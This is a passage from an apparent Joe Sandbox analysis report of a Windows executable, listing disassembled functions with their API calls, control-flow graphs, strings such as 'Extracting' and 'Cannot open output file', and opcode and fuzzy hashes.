                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00BB2CB1
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00BB2D02
                                                                                                                                                                                                              • SetLastError.KERNEL32(000000B7,00000000,00000000), ref: 00BB2D4E
                                                                                                                                                                                                                • Part of subcall function 00BB2603: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 00BB2621
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000), ref: 00BB2D67
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountCurrentErrorLastTick$CreateDirectoryH_prolog3_ProcessThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3262192059-0
                                                                                                                                                                                                              • Opcode ID: e4cbede2d14efe2d8268fb457f968f72d2a8ae08ae9fbc2e24f387159e8e71df
                                                                                                                                                                                                              • Instruction ID: 7e8df96b60f4ff21656d64fe0d69b8cdc9992ed03355efb5797e2face8f46920
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4cbede2d14efe2d8268fb457f968f72d2a8ae08ae9fbc2e24f387159e8e71df
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A31CF32E00214CBDF04EBA4C896BEDB7E1EF59310F1145AAE512B7292DBB04D058B65
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD2214 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 281 bd2214-bd2220 282 bd22c7-bd22ca 281->282 283 bd2225-bd2236 282->283 284 bd22d0 282->284 285 bd2238-bd223b 283->285 286 bd2243-bd225c LoadLibraryExW 283->286 287 bd22d2-bd22d6 284->287 288 bd22c4 285->288 289 bd2241 285->289 290 bd22ae-bd22b7 286->290 291 bd225e-bd2267 GetLastError 286->291 288->282 293 bd22c0-bd22c2 289->293 292 bd22b9-bd22ba FreeLibrary 290->292 290->293 294 bd229e 291->294 295 bd2269-bd227b call bd18e8 291->295 292->293 293->288 296 bd22d7-bd22d9 293->296 298 bd22a0-bd22a2 294->298 295->294 301 bd227d-bd228f call bd18e8 295->301 296->287 298->290 300 bd22a4-bd22ac 298->300 300->288 301->294 304 bd2291-bd229c LoadLibraryExW 301->304 304->298
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                              • API String ID: 0-537541572
                                                                                                                                                                                                              • Opcode ID: 78628c3916726fb3f19b2367661e7fdf34217386b3126f8717f7fd073a018180
                                                                                                                                                                                                              • Instruction ID: 57b57b94bba7d7b55973f32a15dfe9bb3a4057809154f6a234f5bab007e31ed7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78628c3916726fb3f19b2367661e7fdf34217386b3126f8717f7fd073a018180
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6521C331A01255EBDB218B649C85B1AF7E8DF21770B2505A3FC15A7390FB30EE00D6E0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB28B3 Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000010B,?,00000000,0000005C,00BCBDBF,?,-00000088,-0000009A,-000000CA,-000000CA), ref: 00BB28F9
                                                                                                                                                                                                              • GetLastError.KERNEL32(-0000001E,-00000046,0000002A,00000002,0000005C,?,?,00000000,0000005C,00BCBDBF,?,-00000088,-0000009A,-000000CA,-000000CA), ref: 00BB29D5
                                                                                                                                                                                                              • GetLastError.KERNEL32(-0000001E,-00000046,0000002A,00000002,0000005C,?,?,00000000,0000005C,00BCBDBF,?,-00000088,-0000009A,-000000CA,-000000CA), ref: 00BB29EB
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,-00000046,-0000001E,-00000046,0000002A,00000002,0000005C,?,?,00000000,0000005C,00BCBDBF,?,-00000088,-0000009A,-000000CA), ref: 00BB2A0D
                                                                                                                                                                                                              • FindClose.KERNEL32(?,?,?,00000000,0000005C,00BCBDBF,?,-00000088,-0000009A,-000000CA,-000000CA), ref: 00BB2A2E
                                                                                                                                                                                                              • FindClose.KERNEL32(?,-00000046,0000002A,00000002,0000005C,?,?,00000000,0000005C,00BCBDBF,?,-00000088,-0000009A,-000000CA,-000000CA), ref: 00BB2A57
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CloseFind
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2791709076-0
                                                                                                                                                                                                              • Opcode ID: 53854049f41b35538b2ae9346128edd420bdad1480f421fed3d042a80ed9e219
                                                                                                                                                                                                              • Instruction ID: 5734042e7c006f28b78fa797ad731f789f23c619741654ef5b3f174acb3ca5c6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53854049f41b35538b2ae9346128edd420bdad1480f421fed3d042a80ed9e219
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11516732810218DBDF14EBA4DC62AEDB7F5BF15310F1046A9E5A2772A2DFB01A05CB50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB7D65 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,71499961,?,?,?,?,?,?,?,?,?,?,00BD9DE9,000000FF), ref: 00BB7DA4
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00BD9DE9,000000FF), ref: 00BB7DAE
                                                                                                                                                                                                                • Part of subcall function 00BB7FB2: PostMessageA.USER32(?,00008001,00000000,00000000), ref: 00BB7FC7
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00BD9DE9,000000FF), ref: 00BB7DC4
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00BD9DE9,000000FF), ref: 00BB7DE0
                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00BB7E2C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$MessagePost__aulldiv
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3743465594-0
                                                                                                                                                                                                              • Opcode ID: c69a469703f53253523381193e9649b1fa1a2d1357259ac7be9c03f518b394eb
                                                                                                                                                                                                              • Instruction ID: 963d33b38ed0553561929d6abde8b7f23d37a4238398f68ed71d09b9491c6505
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c69a469703f53253523381193e9649b1fa1a2d1357259ac7be9c03f518b394eb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51415A72600208EFCB14EBA4C996EFEBBF5FF88710F00455DE546A7650EB70A904CB60
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB3138 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 353COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 417 bb3138-bb317b call bd9176 call bb38a4 422 bb337e-bb33a5 call bb38c7 call bb37a6 417->422 423 bb3181 417->423 436 bb3401 422->436 437 bb33a7-bb33ae 422->437 425 bb3184-bb3188 423->425 427 bb318a-bb3193 425->427 428 bb3195-bb3199 425->428 430 bb31a4-bb31ac 427->430 431 bb319b-bb319f 428->431 432 bb31a1 428->432 430->425 433 bb31ae-bb31b6 430->433 431->430 431->432 432->430 433->422 435 bb31bc-bb31c3 433->435 435->422 438 bb31c9-bb31e8 call bb16dc * 2 435->438 439 bb3403-bb340a 436->439 437->439 440 bb33b0-bb33bc call bb30f3 437->440 462 bb31ea-bb31f2 438->462 463 bb31f6-bb31fc 438->463 442 bb340c-bb3410 439->442 443 bb3416-bb341c 439->443 446 bb3514-bb3519 call bb2efc 440->446 454 bb33c2-bb33c5 440->454 442->443 442->446 447 bb341e-bb3428 call bb30f3 443->447 448 bb3452-bb3459 call bb384e 443->448 458 bb351e-bb3522 446->458 447->446 460 bb342e-bb3431 447->460 448->446 464 bb345f-bb346a 448->464 454->446 455 bb33cb-bb33e6 call bb2dec call bb1787 454->455 490 bb33e8-bb33f0 455->490 491 bb33f4-bb33fc call bb3583 455->491 465 bb353a 458->465 466 bb3524-bb3526 458->466 460->446 467 bb3437-bb344d call bb2dec 460->467 462->463 470 bb31fe-bb3213 call bb138a 463->470 471 bb3215-bb321d call bb1a00 463->471 464->446 469 bb3470-bb3477 call bb375d 464->469 473 bb353c-bb3540 465->473 466->465 472 bb3528-bb3530 466->472 480 bb354b-bb3552 call bd9153 467->480 469->446 492 bb347d-bb3487 call bb3583 469->492 470->471 488 bb3222-bb322c call bb38a4 470->488 471->488 472->465 478 bb3532-bb3535 call bb3583 472->478 473->480 481 bb3542-bb3545 FindClose 473->481 478->465 481->480 497 bb3269-bb3276 call bb3138 488->497 498 bb322e-bb3234 488->498 490->491 491->480 504 bb3499-bb34cd call bb16dc call bb12c1 * 2 call bb2efc 492->504 505 bb3489-bb3494 call bb1787 492->505 514 bb336b-bb337d call bcbe7d * 2 497->514 515 bb327c-bb32aa call bb1759 call bb16b8 497->515 501 bb3236-bb3239 498->501 502 bb3244-bb325c call bb2dec 498->502 501->497 507 bb323b-bb3242 501->507 502->515 518 bb325e-bb3267 call bb17ef 502->518 535 bb34cf-bb34e5 call bd028c 504->535 536 bb34ee-bb34fb call bb30f3 504->536 505->480 507->497 507->502 514->422 531 bb32d6-bb32ec call bb30b0 515->531 518->515 539 bb32ee 531->539 540 bb32ac-bb32b0 531->540 551 bb34eb 535->551 552 bb356d 535->552 547 bb34fd-bb3500 536->547 548 bb3555-bb356b call bb2dec 536->548 546 bb332f-bb3332 539->546 543 bb32b2-bb32bf call bb2da6 540->543 544 bb3327-bb3329 SetLastError 540->544 561 bb32c1-bb32d1 call bcbe7d call bb16b8 543->561 562 bb32f0-bb32f9 543->562 544->546 550 bb3334-bb3348 call bcbe7d * 2 546->550 553 bb3502-bb3505 547->553 554 bb3507-bb3513 call bcbe7d 547->554 558 bb3570-bb3581 call bb1787 call bcbe7d 548->558 578 bb334a-bb334d FindClose 550->578 579 bb3353-bb3366 call bcbe7d * 2 550->579 551->536 552->558 553->548 553->554 554->446 558->473 561->531 569 bb330b-bb3325 call bb19c5 562->569 570 bb32fb-bb3300 562->570 569->550 570->569 571 bb3302-bb3307 570->571 571->569 578->579 579->480
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB3138: FindClose.KERNEL32(?), ref: 00BB334D
                                                                                                                                                                                                                • Part of subcall function 00BB3138: FindClose.KERNELBASE(?,?,?,00000054,00BB2D36,00000000,00000000), ref: 00BB3545
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000002,-0000003E,00000031,-0000000A,:$DATA,?,?,00000054,00BB2D36,00000000,00000000), ref: 00BB3329
                                                                                                                                                                                                                • Part of subcall function 00BB3583: __EH_prolog3_GS.LIBCMT ref: 00BB358A
                                                                                                                                                                                                                • Part of subcall function 00BB3583: CloseHandle.KERNEL32(?,?,00000000,00000001,00000003,02000000,00000040,00BB353A,?,?,?,00000054,00BB2D36,00000000,00000000), ref: 00BB35C0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$Find$ErrorH_prolog3_HandleLast
                                                                                                                                                                                                              • String ID: :$DATA
                                                                                                                                                                                                              • API String ID: 2190039044-2587938151
                                                                                                                                                                                                              • Opcode ID: 62dc77e35dcf5fb501822ddf7ebceb57edc85977256bac4e3297f2707c2b6062
                                                                                                                                                                                                              • Instruction ID: b5e4f72a0e2b91d0eca2bae093f68354d2620b0dcaf3cd6a452980c8db295914
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62dc77e35dcf5fb501822ddf7ebceb57edc85977256bac4e3297f2707c2b6062
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1D1D470900205DBCF25EBA8C862AFEB7F1EF14B10F50869DE456A72D1EFB09A45CB50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BC5DA0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DialogBoxParamW.USER32(00000061,00000000,00BB79D2,?,?), ref: 00BC5DD5
                                                                                                                                                                                                              • DialogBoxParamA.USER32(00000061,00000000,00BB79D2,?,?), ref: 00BC5DF5
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000001,Extracting,?,?,?,?,-00000086,000001E4), ref: 00BC5E2B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DialogParam$ShowWindow
                                                                                                                                                                                                              • String ID: Extracting
                                                                                                                                                                                                              • API String ID: 2809416057-356925411
                                                                                                                                                                                                              • Opcode ID: 366ff5eb92d0650c6598f4ab8c05223e7e9514636af6f067927b2d3f54b3ebd5
                                                                                                                                                                                                              • Instruction ID: 525228b475dff71aa662eabb4f17fe01cd644f71bad985b541541200b793b63a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 366ff5eb92d0650c6598f4ab8c05223e7e9514636af6f067927b2d3f54b3ebd5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C019E3128450AFBDB20AB20EC5AFADBBA1BF40710F10849AB1016B1F1DFE16D51CB90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BC6655 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 333COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 605 bc6655-bc6680 call bd9176 EnterCriticalSection LeaveCriticalSection 608 bc668c-bc6691 605->608 609 bc6682-bc6687 605->609 611 bc669d-bc66c4 call bb16b8 608->611 612 bc6693-bc6699 608->612 610 bc6a3e-bc6a43 call bd9153 609->610 619 bc66e6-bc66e9 611->619 620 bc66c6-bc66ca 611->620 612->611 623 bc69ad-bc69b2 call bb6bb6 619->623 621 bc66cc-bc66d8 call bb17ef 620->621 622 bc66da-bc66df 620->622 632 bc66f9-bc6711 call bb17ef call bb6bb6 621->632 626 bc66ee-bc66f4 call bb18ab 622->626 627 bc66e1 622->627 631 bc6a33-bc6a3c call bcbe7d 623->631 626->632 627->619 631->610 639 bc6a2b-bc6a2e 632->639 640 bc6717-bc6733 632->640 641 bc6a31 639->641 643 bc6739-bc673d 640->643 644 bc69aa 640->644 641->631 645 bc673f-bc6742 643->645 646 bc6744-bc6749 643->646 644->623 647 bc6752-bc6769 645->647 648 bc674f 646->648 649 bc67e7-bc67ec 646->649 647->644 651 bc676f-bc6799 647->651 648->647 649->644 653 bc67a8-bc67ad 651->653 654 bc679b-bc67a3 call bb6bb6 651->654 655 bc67af-bc67b4 653->655 656 bc67b8-bc67d4 call bb6bb6 653->656 654->644 655->656 656->644 662 bc67da-bc67e0 656->662 663 bc67f9-bc67fc 662->663 664 bc67e2-bc67e5 662->664 666 bc67ff-bc6820 call bb6a33 663->666 664->649 665 bc67f1-bc67f7 664->665 665->666 669 bc682c-bc683c call bb1759 666->669 670 bc6822-bc6827 666->670 676 bc683e-bc6846 call bb6ae7 669->676 677 bc6849-bc684b 669->677 671 bc69a1-bc69a9 call bcbe7d 670->671 671->644 676->677 679 bc684d-bc6851 677->679 680 bc685e-bc6876 call bb1614 677->680 679->680 682 bc6853-bc6859 call bc65fa 679->682 686 bc68a8-bc68cd call bb2dec call bb16b8 call bb3138 680->686 687 bc6878-bc688a call bb17ef 680->687 682->680 704 bc68ed-bc68f1 686->704 705 bc68cf-bc68d9 call bb2848 686->705 692 bc688c-bc6893 call bb25be 687->692 693 bc6895-bc689c call bb251e 687->693 699 bc68a1-bc68a3 692->699 693->699 701 bc696c-bc697e call bcbe7d * 2 699->701 719 bc699d-bc699f 701->719 707 bc68f7-bc693b call bcc0bb call bb227e 704->707 708 bc69d3-bc69fa call bb17ef call bcbe7d * 3 704->708 705->704 714 bc68db-bc68eb call bb190a 705->714 732 bc6940-bc6942 707->732 741 bc6a13 708->741 726 bc695e-bc6967 call bcbe7d 714->726 719->671 724 bc6980-bc6989 719->724 724->719 727 bc698b-bc699a call bcbe7d call bcc200 724->727 726->701 727->719 736 bc69b4-bc69bf 732->736 737 bc6944-bc695a call bb190a 732->737 745 bc69c7-bc69cf 736->745 746 bc69c1-bc69c3 736->746 737->726 747 bc6a16-bc6a18 741->747 745->708 746->745 748 bc69fc-bc6a02 747->748 749 bc6a1a-bc6a29 call bcbe7d call bb6bb6 747->749 748->747 750 bc6a04-bc6a0e call bcbe7d call bcc200 748->750 749->641 750->741
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,00000094), ref: 00BC666E
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BC6678
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Cannot open output file, xrefs: 00BC6944
                                                                                                                                                                                                              • Cannot delete output file, xrefs: 00BC68DB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                              • String ID: Cannot delete output file$Cannot open output file
                                                                                                                                                                                                              • API String ID: 3168844106-3995894881
                                                                                                                                                                                                              • Opcode ID: 4d927fe24882846a20768ef846857b59341c47a71aabf3ef32635d499f6f44c7
                                                                                                                                                                                                              • Instruction ID: d457571ee7e675b3b3b466e2c1decfd3bf6754286e51c18797336103fe6f3816
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d927fe24882846a20768ef846857b59341c47a71aabf3ef32635d499f6f44c7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BD16671900219EBDB24EFA4C895FEDBBF4BF08314F1085AEE515AB291DB70AD45CB90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB7BF0 Relevance: 6.0, APIs: 4, Instructions: 40windowtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB45BC: SetEvent.KERNEL32(?,00BBEBD6,?,00BBDB41,71499961,?,?,Function_00029CA0,000000FF), ref: 00BB45BE
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000064), ref: 00BB7C13
                                                                                                                                                                                                              • LoadIconA.USER32(00000000), ref: 00BB7C2D
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00BB7C3D
                                                                                                                                                                                                              • SetTimer.USER32(?,00000003,00000064,00000000), ref: 00BB7C4B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EventIconItemLoadMessageSendTimer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2758541657-0
                                                                                                                                                                                                              • Opcode ID: 9949b24176f72a055e933126e9911cfb02ecbe7527aa9bcfe78839027946de5f
                                                                                                                                                                                                              • Instruction ID: 54cc57136c4bea32d34255e32c96e7704763edd4870e6da9d3f77a6e01856451
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9949b24176f72a055e933126e9911cfb02ecbe7527aa9bcfe78839027946de5f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9014831140B009FE7215B24D859BAABBE6BB44720F10461EF2A2969F0DFB2A9528B10
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD04B7 Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 850 bd04b7-bd04c2 851 bd04d8-bd04eb call bd0467 850->851 852 bd04c4-bd04d7 call bd1b8b call bd1ace 850->852 857 bd04ed-bd050a CreateThread 851->857 858 bd0519 851->858 860 bd050c-bd0518 GetLastError call bd1b55 857->860 861 bd0528-bd052d 857->861 862 bd051b-bd0527 call bd03d9 858->862 860->858 866 bd052f-bd0532 861->866 867 bd0534-bd0538 861->867 866->867 867->862
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNELBASE(-00000086,?,00BD035B,00000000,?,-00000086), ref: 00BD0500
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,000000A4,00BCB95B,-000000EA,?,-00000088,-0000009A,-000000CA,-000000CA), ref: 00BD050C
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00BD0513
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                              • String ID:
